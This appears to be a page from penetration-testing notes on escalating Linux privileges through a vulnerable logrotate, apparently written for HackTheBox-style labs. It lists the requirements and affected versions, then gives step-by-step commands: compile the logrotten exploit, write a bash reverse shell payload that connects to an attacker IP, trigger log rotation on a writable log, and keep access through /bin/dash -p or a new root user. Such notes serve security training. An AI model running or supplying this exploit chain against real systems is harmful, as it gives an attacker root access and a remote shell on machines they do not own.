Logrotate

To exploit logrotate, we need some requirements that we have to fulfill.

  1. we need write permissions on the log files

  2. logrotate must run as a privileged user or root

  3. vulnerable versions:

    • 3.8.6

    • 3.11.0

    • 3.15.0

    • 3.18.0

Version

$ logrotate --version
logrotate 3.11.0

Logrotten

LogoGitHub - whotwagner/logrottenGitHub
$ git clone https://github.com/whotwagner/logrotten.git
$ cd logrotten
$ gcc logrotten.c -o logrotten
echo 'bash -i >& /dev/tcp/10.10.14.2/9001 0>&1' > payload

Which option logrotate uses

$ grep "create\|compress" /etc/logrotate.conf | grep -v "#"

create
./logrotten -p ./payload /tmp/tmp.log

Example

2 access.log writable

Run exploit and trigger logrotate by writing on file

htb-student@ubuntu:~/backups$ echo 'f*' > access.log

For persistance: /bin/dash -p

Also possible to create a root user and log in with it. See references

References

LogoLinux PrivEsc with Logrotate UtilityR3d Buck3T
LogoHackTheBox – BookIvan's IT learning blog
PreviousKubernetesNextMiscellaneous Techniques

Last updated